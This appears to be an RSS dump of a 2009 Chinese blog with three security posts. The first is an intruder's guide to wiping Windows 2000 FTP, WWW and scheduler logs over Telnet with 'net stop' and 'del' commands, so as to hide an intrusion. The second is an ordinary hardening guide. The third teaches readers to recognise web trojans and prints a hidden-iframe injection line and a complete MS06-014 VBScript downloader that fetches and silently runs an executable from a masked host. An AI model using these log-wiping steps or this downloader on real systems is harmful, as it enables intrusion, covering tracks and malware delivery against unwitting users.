<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="http://feeds.qzone.qq.com/rss.xsl" version="1.0"?>
<rss version="2.0" xmlns:qz="http://qzone.qq.com">
<channel>
<title><![CDATA[L. xin]]></title>
<description><![CDATA[L.xin'S Blog]]></description>
<link>http://214567620.qzone.qq.com</link>
<lastBuildDate>Fri, 27 Nov 2009 13:30:24 GMT</lastBuildDate>
<generator>Qzone</generator>
<language>zh-cn</language>
<copyright>Copyright (C), 2005-2008, Tencent Tech. Co., Ltd.</copyright>
<pubDate>Sat, 31 Oct 2009 00:35:49 GMT</pubDate>

<item>
<title><![CDATA[完美清理日志的总结]]></title>
<link>http://214567620.qzone.qq.com/blog/1256949349</link>
<description><![CDATA[<br>　　一:开始 - 程序 - 管理工具 - 计算机管理 - 系统工具 -事件查看器，然后清除日志。<br>　　二: Windows2000的日志文件通常有应用程序日志，安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等。<br>　　日志文件默认位置：<br>　　应用程序日志、安全日志、系统日志、DNS日志默认位置：%sys temroot%system32config，默认文件大小512KB，管理员都会改变这个默认大小。<br>　　安全日志文件：%systemroot%system32configSecEvent.EVT;<br>　　系统日志文件：%systemroot%system32configSysEvent.EVT;<br>　　应用程序日志文件：%systemroot%system32configAppEvent.EVT;<br>　　Internet信息服务FTP日志默认位置：%systemroot%system32logfilesmsftpsvc1，默认每天一个日志;<br>　　Internet信息服务WWW日志默认位置：%systemroot%system32logfilesw3svc1，默认每天一个日志;<br>　　Scheduler服务日志默认位置：%sys temroot%schedlgu.txt;<br>　　以上日志在注册表里的键：<br>　　应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的：<br>　　HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog<br>　　有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。<br>　　Schedluler服务日志在注册表中<br>　　HKEY_LOCAL_MACHINESOFTWAREMicrosoftSchedulingAgent<br>　　FTP和WWW日志详解：<br>　　FTP日志和WWW日志默认情况，每天生成一个日志文件，包含了该日的一切记录，文件名通常为ex(年份)(月份)(日期)，例如ex001023，就是2000年10月23日产生的日志，用记事本就可直接打开，如下例：<br>　　#Software: Microsoft Internet Information Services 5.0(微软IIS5.0)<br>　　#Version: 1.0 (版本1.0)<br>　　#Date: 20001023 0315 (服务启动时间日期)<br>　　#Fields: time cip csmethod csuristem scstatus<br>　　0315 127.0.0.1 [1]USER administator 331　(IP地址为127.0.0.1用户名为administator试图登录)<br>　　0318 127.0.0.1 [1]PASS – 530　(登录失败)<br>　　032:04 127.0.0.1 [1]USER nt 331　(IP地址为127.0.0.1用户名为nt的用户试图登录)<br>　　032:06 127.0.0.1 [1]PASS – 530　(登录失败)<br>　　032:09 127.0.0.1 [1]USER cyz 331　(IP地址为127.0.0.1用户名为cyz的用户试图登录)<br>　　0322 127.0.0.1 [1]PASS – 530　(登录失败)<br>　　0322 127.0.0.1 [1]USER administrator 331　(IP地址为127.0.0.1用户名为administrator试图登录)<br>　　0324 127.0.0.1 [1]PASS – 230　(登录成功)<br>　　0321 127.0.0.1 [1]MKD nt 550　(新建目录失败)<br>　　0325 127.0.0.1 [1]QUIT – 550　(退出FTP程序)<br>　　从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统，换了四次用户名和密码才成功，管理员立即就可以得知管理员的<a href="http://hack.77169.com/List/List_45.html" target="_blank">入侵</a><wbr />时间、IP地址以及探测的用户名，如上例<a href="http://hack.77169.com/List/List_45.html" target="_blank">入侵</a><wbr />者最终是用administrator用户名进入的，那么就要考虑更换此用户名的密码，或者重命名administrator用户。<br>　　WWW日志：<br>　　WWW服务同FTP服务一样，产生的日志也是在%sys temroot%sys tem32LogFilesW3SVC1目录下，默认是每天一个日志文件，下面是一个典型的WWW日志文件<br>　　#Software: Microsoft Internet Information Services 5.0<br>　　#Version: 1.0<br>　　#Date: 20001023 03:091<br>　　#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)<br>　　20001023 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)<br>　　20001023 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)<br>　　通过分析第六行，可以看出2000年10月23日，IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口，查看了一个页面iisstart.asp,这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt，有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定<a href="http://hack.77169.com/List/List_45.html" target="_blank">入侵</a><wbr />者的IP地址以及<a href="http://hack.77169.com/List/List_45.html" target="_blank">入侵</a><wbr />时间。<br>　　既使你删掉FTP和WWW日志，但是还是会在系统日志和安全日志里记录下来，但是较好的是只显示了你的机器名，并没有你的IP。<br>　　属性里记录了出现警告的原因，是因为有人试图用administator用户名登录，出现一个错误，来源是FTP服务。<br>　　这里有两种图标：钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标，表示四次失败审核，事件类型是帐户登录和登录、注销失败，日期为2000年10月18日，时间为1002，这就需要重点观察。<br>　　双点第一个失败审核事件的，即得到此事件的详细描述。<br>　　经过分析我们可以得知有个CYZ的工作站，用administator用户名登录本机，但是因为用户名未知或密码错误(实际为密码错误)未能成功。另外还有DNS服务器日志，不太重要，就此略过(其实是我没有看过它)。<br>　　知道了Windows2000日志的详细情况，下面就要学会怎样删除这些日志：<br>　　通过上面，得知日志文件通常有某项服务在后台保护，除了系统日志、安全日志、应用程序日志等等，它们的服务是Windos2000的关键进程，而且与注册表文件在一块，当Windows2000启动后，启动服务来保护这些文件，所以很难删除，而FTP日志和WWW日志以及Scedlgu日志都是可以轻易地删除的。首先要取得Admnistrator密码或Administrators组成员之一，然后Telnet到远程主机，先来试着删除FTP日志：<br>　　D:SERVER&gt;del schedlgu.txt<br>　　D:SERVERSchedLgU.Txt<br>　　进程无法访问文件，因为另一个程序正在使用此文件。说过了，后台有服务保护，先把服务停掉!<br>　　D:SERVER&gt;net stop &quot;task scheduler&quot;<br>　　下面的服务依赖于 Task Scheduler 服务。停止 Task Scheduler 服务也会停止这些服务。<br>　　Remote Storage Engine<br>　　是否继续此操作? (Y/N) [N]: y<br>　　Remote Storage Engine 服务正在停止....<br>　　Remote Storage Engine 服务已成功停止。<br>　　Task Scheduler 服务正在停止.<br>　　Task Scheduler 服务已成功停止。<br>　　OK，它的服务停掉了，同时也停掉了与它有依赖关系的服务。再来试着删一下!<br>　　D:SERVER&gt;del schedlgu.txt<br>　　D:SERVER&gt;<br>　　没有反应?成功了!下一个是FTP日志和WWW日志，原理都是一样，先停掉相关服务，然后再删日志!<br>　　D:SERVERsystem32LogFilesMSFTPSVC1&gt;del ex*.log<br>　　D:SERVERsystem32LogFilesMSFTPSVC1&gt;<br>　　以上操作成功删除FTP日志!再来WWW日志!<br>　　D:SERVERsystem32LogFilesW3SVC1&gt;del ex*.log<br>　　D:SERVERsystem32LogFilesW3SVC1&gt;<br>　　OK!恭喜，现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了，守护这些日志的服务是Event Log，试着停掉它!<br>　　D:SERVERsystem32LogFilesW3SVC1&gt;net stop eventlog<br>　　这项服务无法接受请求的 &quot;暂停&quot; 或 &quot;停止&quot; 操作。没办法，它是关键服务。如果不用第三方工具，在命令行上根本没有删除安全日志和系统日志的可能!所以还是得用虽然简单但是速度慢得死机的办法：打开“控制面板”的“管理工具”中的“事件查看器”(98没有，知道用Win2k的好处了吧)，在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单，点击它，输入远程计算机的IP，然后等上数十分钟，接着选择远程计算机的安全性日志，右键选择它的属性：点击属性里的“清除日志”按钮，OK!安全日志清除完毕!同样的忍受痛苦去清除系统日志! 目前在不借助第三工具的情况下，能很快，很顺利地清除FTP、 WWW还有Schedlgu日志，就是系统日志和安全日志属于Windows2000的严密守护，只能用本地的事件查看器来打开它，因为在图形界面下，加之网速又慢，如果你银子多，时间闲，还是可以清除它的。综上所述，介绍了Windows2000的日志文件以及删除方法，但是你必须是 Administrator，注意必须作为管理员或管理组的成员登录才能打开安全日志记录。该过程适用于 Windows 2000 Professional 计算机，也适用于作为独立服务器或成员服务器运行的 Windows 2000 Server 计算机。 <!--v:3.2--> ]]></description>
<category><![CDATA[网络攻防]]></category>
<author><![CDATA[214567620@qq.com(L. xin)]]></author>
<comments>http://214567620.qzone.qq.com/blog/1256949349#comment</comments>
<qz:effect>134218240</qz:effect>
<pubDate>Sat, 31 Oct 2009 00:35:49 GMT</pubDate>
<guid>http://214567620.qzone.qq.com/blog/1256949349</guid>
</item>

<item>
<title><![CDATA[入侵防御（三）]]></title>
<link>http://214567620.qzone.qq.com/blog/1256188163</link>
<description><![CDATA[<br>转载：出自暗组信息安全论坛 <a href="http://forum.darkst.com/" target="_blank">http://forum.darkst.com/</a><wbr /><br><br>从本文你可以学到：<br>如何管理计算机用户<br>如何为自己系统打补丁<br>三、防漏洞扫描入侵<br>说起漏洞我们就不得不说说它的发现者——Hacker（黑客），黑客这个名词的意思是：一个计算机通，能够随心所欲的驾驶计算机的人都可称为Hacker（闯入他人计算机系统并进行破坏的人称为Cracker ）。在世界上的其它地方，人们总是把那些闯入他人计算机系统的人称为Hacker。漏洞的产生通常是由于软件的缺陷造成即：Bug，是因为编写程序的程序员的水平有限或者粗心造成的！而编写的程序越大出现漏洞的几率就越大。就比如：现在炒的最火的Vista系统吧！还没发布正式版就传出有漏洞被发现……。然后比尔就命令手下：“给我补好咯！”。好现在进入正题给我们系统做个体检 GO！<br>我们使用的系统多数是Windows XP SP2 （如图1） 吧，好我们就围绕XP来说说怎么防御漏洞扫描入侵！<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0eaebd0ff8951fb2172d6883fb111f41ddbcf10821d394707707b28a72889c4c600dbabd34b5fe9cf876cf0c149e67ee5bdc58f5579889fde6b40eae6698e8f6c30c8b17ed&amp;a=10&amp;b=25" target="_blank"><img style="width:420px;height:495px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0eaebd0ff8951fb2172d6883fb111f41ddbcf10821d394707707b28a72889c4c600dbabd34b5fe9cf876cf0c149e67ee5bdc58f5579889fde6b40eae6698e8f6c30c8b17ed&amp;a=10&amp;b=25" /></a><wbr /><br><br>（图 1 识别XP系统的标志性属性）<br>我们分为三步进入课程：第一步安全分配用户；第二步关闭系统默认共享；第三步为自己系统打补丁。<br>1. 安全分配用户<br>一般电脑从电脑城买回来如果是已经安装系统的我们必须检查Administrator用户是否设置了密码当然最好是重新设置一下“强壮”的密码，是否强壮必须具备一下条件：字母（大小写）+ 数字 + 特殊符号（如：·#￥标点符号等）=强壮的密码（长度在8位以上）修改密码的方法如下：<br>右击我的电脑→在弹出的快捷菜单中选择管理（如图2）→在本地计算机管理中选择系统工具→展开本地用户和组→在单击用户即可以打开（如图3）所示，在Administrator用户名右击一下选设置密码在提示（如图4）中点继续输入你想要的新密码确定即可。还有一些帐号我们在实际使用中是用不到的我们可以删除防止被人破解出密码威胁到你的计算机安全。对于Guest用户删除可以通过注册表来删除该用户方法如下：<br>单击开始菜单选择运行命令→输入regedit 回车确定依次展开如下地址：HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest 如无法展开HKEY_LOCAL_MACHINE\SAM\SAM请为它设置权限即可→在这点选SAM项目右击→权限把你使用的帐号添加进去即可并添加完全控制权限确定即可！（如图5）然后完整打开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\找到Guest项（如图 6）然后右击单击选择删除，在提示是否删除选确定。重新启动电脑即发现原来在用户管理里删除不了的Guest帐号奇迹般的消失了 呵呵！至于权限问题我就不想多说了大家自己琢磨吧，给一般用户设置一个User权限的帐号就可以了！<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e3bd3b0b72a6c8ccc2b7e51d45adca3c2c2b5069b1e4bc47cdfe512a555af38fc2f7e0536a0da951257043a97ebfa0eee815d299d7b907db3125a398a96beeac8ddef12c0&amp;a=25&amp;b=25" target="_blank"><img style="width:156px;height:221px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e3bd3b0b72a6c8ccc2b7e51d45adca3c2c2b5069b1e4bc47cdfe512a555af38fc2f7e0536a0da951257043a97ebfa0eee815d299d7b907db3125a398a96beeac8ddef12c0&amp;a=25&amp;b=25" /></a><wbr /><br>图2 单击菜单中的管理项<br><wbr /><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e7e4a88c829a66ac9a06ad9cc706aaa61415aad52c72b663752e9a98a1a9284aa1de72078378a7932c1a35cfe3204fecaa4209d02744a2e60755ed45fc09dbfb294fe10eb&amp;a=25&amp;b=23" target="_blank"><img style="width:554px;height:393px;border:0;" src="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e7e4a88c829a66ac9a06ad9cc706aaa61415aad52c72b663752e9a98a1a9284aa1de72078378a7932c1a35cfe3204fecaa4209d02744a2e60755ed45fc09dbfb294fe10eb&amp;a=25&amp;b=23" /></a><wbr /><br>图 3 显示计算机中所有的用户<br><wbr /><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e6caa3d4727cdf86c04a3d8382d48b54fb215ae6bf02564e679c7b87c0a6a490631cb160e8eacae831307133c2aa373ff849438919c07872ce53933abc6f2d1eb6485d053&amp;a=25&amp;b=24" target="_blank"><img style="width:493px;height:263px;border:0;" src="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e6caa3d4727cdf86c04a3d8382d48b54fb215ae6bf02564e679c7b87c0a6a490631cb160e8eacae831307133c2aa373ff849438919c07872ce53933abc6f2d1eb6485d053&amp;a=25&amp;b=24" /></a><wbr /><br>图 4 提示是否需要修改Administrator密码<br><wbr /><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e5febfb086630c3fa20e4da61c0e014ef16ce030d98219248c397abd51aab0b710dc068f8973cf82d2973f02f4e0c979af55fbb5550c0de99573228d1c27996bb622952c6&amp;a=24&amp;b=24" target="_blank"><img style="width:368px;height:417px;border:0;" src="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e5febfb086630c3fa20e4da61c0e014ef16ce030d98219248c397abd51aab0b710dc068f8973cf82d2973f02f4e0c979af55fbb5550c0de99573228d1c27996bb622952c6&amp;a=24&amp;b=24" /></a><wbr /><br>图 5 设置访问注册表的权限<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e0f8c8badb117165c485c1cb0c11c2d534b74d87c316073bbdd46bc1ff6551c4c78d159258889ff2be296f75fca7e1c256edc22489a1937c71340bc05bd24c7f4df2650aa&amp;a=24&amp;b=25" target="_blank"><img style="width:554px;height:374px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e0f8c8badb117165c485c1cb0c11c2d534b74d87c316073bbdd46bc1ff6551c4c78d159258889ff2be296f75fca7e1c256edc22489a1937c71340bc05bd24c7f4df2650aa&amp;a=24&amp;b=25" /></a><wbr /><br>图6 打开Guest 帐号项目所在的主键<br>2. 关闭系统默认共享<br>默认共享即开机自动把用户电脑上的所有本地磁盘进行共享，（如：C$ 、D$、IPC$等看用户机器的分区数量而定）原来是方便管理员文件传送方便的。而现在则变为入侵利用的一个途径……！我们就要关闭这危险的默认共享。使用批处理给它快速关闭<br>net share ipc$/del<br>net share admin$ /del<br>net share c$ /del<br>net share d$/del<br>net share e<br>$/del  <br>把以上的内容保存到一个文本中（如图 7）（这里只是删除Ipc、Admin、c、d、e的共享，如果还有别的盘请自己添加），在修改后缀.bat 运行一下即可删除全部共享<br>不过重新开机会自动在开启。所以想完全禁止只有修改注册表或者禁用服务……，<br>修改注册表方法：（还不清楚向上看吧）<br>运行-regedit<br>server版找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。 <br>pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。 <br>如果上面所说的主键不存在，就新建(右击-新建-双字节值)一个主健再改键值。<br>禁用服务server：<br>右击我的电脑→在弹出的快捷菜单中选择管理→服务和应用程序→服务（如图 8）-找到服务server（右击）-属性-常规-启动类型-已禁用 即可！不过这种方法对以后使用网络的一些程序会出现问题不推荐。<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0ee9f1fc709fdef5caa729c06da6c8fd89bbabb291908b70bc62996df31083c4daf8b1d2a22a5899c7c0ff2f8906c46284cd96304dcb411c2f640f15826b12de8ff90d2560&amp;a=25&amp;b=25" target="_blank"><img style="width:258px;height:173px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0ee9f1fc709fdef5caa729c06da6c8fd89bbabb291908b70bc62996df31083c4daf8b1d2a22a5899c7c0ff2f8906c46284cd96304dcb411c2f640f15826b12de8ff90d2560&amp;a=25&amp;b=25" /></a><wbr /><br>图 7 写入命令的文本<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e77f69cb5b0deb277a857de187100c29c637be01b085e836bc7d4aa9ab5473a36ec77778483228851c6379a2d5e7e0a8f699d4ca4e74077527e105db4f93cb18703b8a60e&amp;a=25&amp;b=25" target="_blank"><img style="width:554px;height:393px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e77f69cb5b0deb277a857de187100c29c637be01b085e836bc7d4aa9ab5473a36ec77778483228851c6379a2d5e7e0a8f699d4ca4e74077527e105db4f93cb18703b8a60e&amp;a=25&amp;b=25" /></a><wbr /><br><br>图8 打开显示服务的面板<br>3. 为自己系统打补丁<br>对于漏洞最好的方法就是更新程序，但是系统这么大我们怎么更新？不用怕微软已经考虑到这一点专门为我们XP2用户提供了一个更新系统补丁的程序《自动更新》我们只要正确使用该功能就可以最大避免漏洞给我们带来的损失！使用方法：<br>右击我的电脑→在弹出的快捷菜单中选择属性→自动更新选项卡→选自动并设置一个适当的时间进行更新吧（如图 9）这个在一些GHOST制作的系统中默认选择关闭的所以要手动打开（这里说一下市面上所谓的GHOST系统，都可能加入了作者后门哦！够黑吧……如果条件允许还是用安装版本的系统把最好是纯净的XP原版）除了微软提供自动更新程序外我们也可以主动扫描系统的漏洞，现在很多大杀毒软件公司已经为我们提供了这类扫描工具。例如：瑞星的卡卡助手、奇虎的360卫士等。<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e2d9b3587ab25597bde96d6f88e7cf836b28f1224eb6b210244f23b45b379023283f1bbb143bdb71f2b80e07a2786e8d2f16b045e326b7bf7c101f2bbce4c84f1bb169aa0&amp;a=25&amp;b=25" target="_blank"><img style="width:420px;height:495px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e2d9b3587ab25597bde96d6f88e7cf836b28f1224eb6b210244f23b45b379023283f1bbb143bdb71f2b80e07a2786e8d2f16b045e326b7bf7c101f2bbce4c84f1bb169aa0&amp;a=25&amp;b=25" /></a><wbr /><br>图9 设置自动更新<br><br>只要上边三步你都认真的做了！恭喜你你的电脑处于安全状态了。<br>总结：攻与防始终是矛盾的一方，始终没有停止，所有我们要做好迎接战斗的准备！到此反黑精英 之 入侵防御系列文章已经全部撰写完毕了。欢迎大家到暗组技术论坛交流学习 <a href="http://www.darkst.com" target="_blank">http://www.darkst.com</a><wbr /> <!--v:3.2--> ]]></description>
<category><![CDATA[网络攻防]]></category>
<author><![CDATA[214567620@qq.com(L. xin)]]></author>
<comments>http://214567620.qzone.qq.com/blog/1256188163#comment</comments>
<qz:effect>134218241</qz:effect>
<pubDate>Thu, 22 Oct 2009 05:09:23 GMT</pubDate>
<guid>http://214567620.qzone.qq.com/blog/1256188163</guid>
</item>

<item>
<title><![CDATA[入侵防御（二）]]></title>
<link>http://214567620.qzone.qq.com/blog/1256186920</link>
<description><![CDATA[<br>转载：出自暗组信息安全论坛 <a href="http://forum.darkst.com/" target="_blank">http://forum.darkst.com/</a><wbr /><br> <br>从本文你可以学到：<br>1. 如何识别网页是否存在木马<br>2. 如何正确处理系统中IE漏洞<br>二、防网页木马入侵<br>大家看到这章标题的时候可能都这么想：“什么啊？网页木马入侵！ 那我们上网浏览网站（冲浪）的安全谁来保护我们啊，”对于这些顾虑你可以不用去想，因为你看完这部分文献你基本上就可以大胆的遨游Internet(因特网)。<br>下面我们用四个方法：第一种识别利用隐藏框架调用htm 、第二种识别利用重定向任何调用的htm、js、第三种防御网页木马我只用IE、第四种IE漏洞修补及意见；带你进入安全互联网时代Let GO!<br>⒈识别利用隐藏框架调用htm <br>利用隐藏框架链接到网页木马就是其实就是利用HTML网页语言，制作一个肉眼无法看到的一个框然后后台隐藏打开网页木马地址，从而执行了恶意代码（漏洞利用的代码）。我们简单分析一下这段常用的网页挂马代码把，懂HTML语言都应该清楚的：&lt;iframe src=http://www.xxxx.com/muma.htm width=0 height=0&gt;&lt;/iframe&gt; 其实就是一个宽和高都为0的框大家当然看不到了，从而达到后台隐藏打开含有恶意代码的网页（即网页木马）→种植后门→远程控制进行信息窃取或者进行磁盘文件破坏 等一系列动作……。对于防范我们可以利用一款软件《网页木马防护器》。比如：我们想访问的网站为“http://www.darkteam.cn” 在软件查看页面选项中输入地址即可查看到该网站的首页（即：主页）（如图1）可以看出我们现在访问的网站页面应该是正常的！现在我们看看不是正常的页面提示什么吧！（如图2）检查提示中显示：“网页有不可见窗体，有木马，小心！” 看到这个不用我说你们要做什么了吧。赶紧杀毒吧！（这款软件判断标准就是&lt;iframe src=http:// width=0 height=0&gt;&lt;/iframe&gt;符合就回提示有不可见窗体，软件缺陷就是也可以算是BUG &lt;iframe src=http://www.xxxx.com/muma.htm width=1 height=1&gt;&lt;/iframe&gt;改一下宽和高就检查不到了(如图3） 弱智吧！ 关键时刻还是要靠自己……至于软件问题我就不想多说因为也不是我编写的，有能力的可以报告给作者叫他更新或者自己编写一个程序，这里我们继续用这款软件人工判断。）<br>我们自行判断代码所要看的关键字是“&lt;iframe src=http://任何地址（或/任何地址） width=0 height=0&gt;&lt;/iframe&gt;  winth= 0到 10 之间 height= 0 到 10 之间 ，还要判断一定要在&lt;iframe &lt;/iframe&gt;之间才有效”代码可以在软件的&lt;网页源代码&gt; 中看到 一般在网页的底端&lt;/html&gt; 之前 对于代码太多不好看的时候可以使用复制全部代码到任何一款文本编辑器中如：“记事本”然后用查找功能搜索关键字“&lt;iframe”在进行代码判断！进行这个判断以后基本可以杜绝这类代码对您心爱的危害！<br><wbr /><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e3dde334d46941b9b354199435e0b72a9578e48adbcf8ea2a9d2ef3f73e42ef105551b42ef6c9a89f637b2d84a3c9e8b59cf150784fffc3d6b6f779049262b9f7af66d938&amp;a=25&amp;b=24" target="_blank"><img style="width:365px;height:406px;border:0;" src="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e3dde334d46941b9b354199435e0b72a9578e48adbcf8ea2a9d2ef3f73e42ef105551b42ef6c9a89f637b2d84a3c9e8b59cf150784fffc3d6b6f779049262b9f7af66d938&amp;a=25&amp;b=24" /></a><wbr /><br>图1 正在检查站点的默认主页<br><wbr /><a href="http://b12.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e720a6b714b9e3fb5b73f37fc4b38b7b8e417b0dde98ffb32d34c37c8a943ecb6961194203aceafe89d0be268d0c55bca5a509e1aecef65822d6d42e6c9d05cf7a779e1f7&amp;a=25&amp;b=12" target="_blank"><img style="width:365px;height:406px;border:0;" src="http://b12.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e720a6b714b9e3fb5b73f37fc4b38b7b8e417b0dde98ffb32d34c37c8a943ecb6961194203aceafe89d0be268d0c55bca5a509e1aecef65822d6d42e6c9d05cf7a779e1f7&amp;a=25&amp;b=12" /></a><wbr /><br>图2 含有恶意代码的页面<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0efa4f88150a03ae07c62bb118ce11961826133df14c182863e985507a9b5ee6bfb03c9893cb66231ccca636ef179da17759108a253b4dc22162e2372b28394a6b758cd306&amp;a=25&amp;b=25" target="_blank"><img style="width:365px;height:406px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0efa4f88150a03ae07c62bb118ce11961826133df14c182863e985507a9b5ee6bfb03c9893cb66231ccca636ef179da17759108a253b4dc22162e2372b28394a6b758cd306&amp;a=25&amp;b=25" /></a><wbr /><br>图3 变异的恶意代码页面轻松躲避检查<br><br>⒉识别利用重定向任何调用的htm、js<br>这类调用很难检查，不过使用率到现在还不是很高。《网页木马防护器》检查主页然后查看是否有这个代码？“&lt;script language=javascript src=http://任意文件.js 或 任意文件.js&gt;&lt;/script&gt;”（如图4）这类检查难就难在这个调用JS的代码是正常的，不正常的恶意代码是在JS里而不是主页中。我们只有把这个JS下载下来检查（可以使用下载工具如迅雷，批量下载回来检查）……。JS文件中恶意代码代码特征和HTM主页特征基本一样，代码如下：“document.write(&quot;&lt;iframe &lt;iframe src=http://任何地址（或/任何地址）width=0 height=0&gt;&lt;/iframe&gt;&quot;);” winth= 0到 10 之间 height= 0 到 10 之间 ，还要判断一定要在&lt;iframe &lt;/iframe&gt;之间才有效。<br><wbr /><a href="http://b10.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e8bbe66f5ea8324986be226d92e43e7a06ebe8aec2a69abd97e4172225789cb32289d450f5ad092bf91164c9d29911e8ebe8aec5abd48ab3e9b799217a40ae6cd9a6fcd94&amp;a=10&amp;b=10" target="_blank"><img style="width:365px;height:406px;border:0;" src="http://b10.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e8bbe66f5ea8324986be226d92e43e7a06ebe8aec2a69abd97e4172225789cb32289d450f5ad092bf91164c9d29911e8ebe8aec5abd48ab3e9b799217a40ae6cd9a6fcd94&amp;a=10&amp;b=10" /></a><wbr /><br>图4 正常调用JS行为<br><br>对于连接到网页木马可以查看是否存在这些典型的代码：<br>MS06014 网页木马的恶意代码：（网页木马代码远远不止这些其实还有很多不过都不能对IE6.0或者打过补丁的系统起作用！）<br>&lt;html&gt;<br>&lt;script language=&quot;VBScript&quot;&gt;  调用VBScript脚本 只要禁用这个脚本基本可以防好多网页木马了！<br>on error resume next<br>dl = &quot;<a href="http://www.*****.com/go.exe" target="_blank">http://www.*****.com/go.exe</a><wbr />&quot;   下载木马的地址<br>Set df = document.createElement(&quot;object&quot;)<br>df.setAttribute &quot;classid&quot;, &quot;clsid:BD96C556-65A3-11D0-983A-00C04FC29E36&quot;<br>str=&quot;Microsoft.XMLHTTP&quot;<br>Set x = df.CreateObject(str,&quot;&quot;)<br>a1=&quot;Ado&quot;<br>a2=&quot;db.&quot;<br>a3=&quot;Str&quot;<br>a4=&quot;eam&quot;<br>str1=a1&amp;a2&amp;a3&amp;a4<br>str5=str1<br>set S = df.createobject(str5,&quot;&quot;)<br>S.type = 1<br>str6=&quot;GET&quot;<br>x.Open str6, dl, False<br>x.Send<br>fname1=&quot;g0ld.com&quot;<br>set F = df.createobject(&quot;Scripting.FileSystemObject&quot;,&quot;&quot;)<br>set tmp = F.GetSpecialFolder(2) <br>fname1= F.BuildPath(tmp,fname1)<br>S.open<br>S.write x.responseBody<br>S.savetofile fname1,2<br>S.close<br>set Q = df.createobject(&quot;Shell.Application&quot;,&quot;&quot;)<br>Q.ShellExecute fname1,&quot;&quot;,&quot;&quot;,&quot;open&quot;,0<br>&lt;/script&gt;<br>&lt;head&gt;<br>&lt;title&gt;Oh,my god!&lt;/title&gt;  提示给浏览者的信息，顶部标题栏显示。<br>&lt;/head&gt;&lt;body&gt;<br>&lt;center&gt;You DO it!&lt;/center&gt; 显示的文字信息<br>&lt;/body&gt;&lt;/html&gt;<br>从上面代码我们可以看出网页基本是HTML静态页面，不过也不排除ASP版的网页木马。之前我们介绍的两种方法是防御联接网页木马的方法，也就是通常所说的“挂马”是很多小黑客经常使用的方法，但是如果是本身就是漏洞利用的恶意代码呢？我们不是……没法了？好我们现在我们进入防网页木马的方法吧！<br>⒊防御网页木马我只用IE<br>这里以常用浏览器IE6.0版本来介绍方法：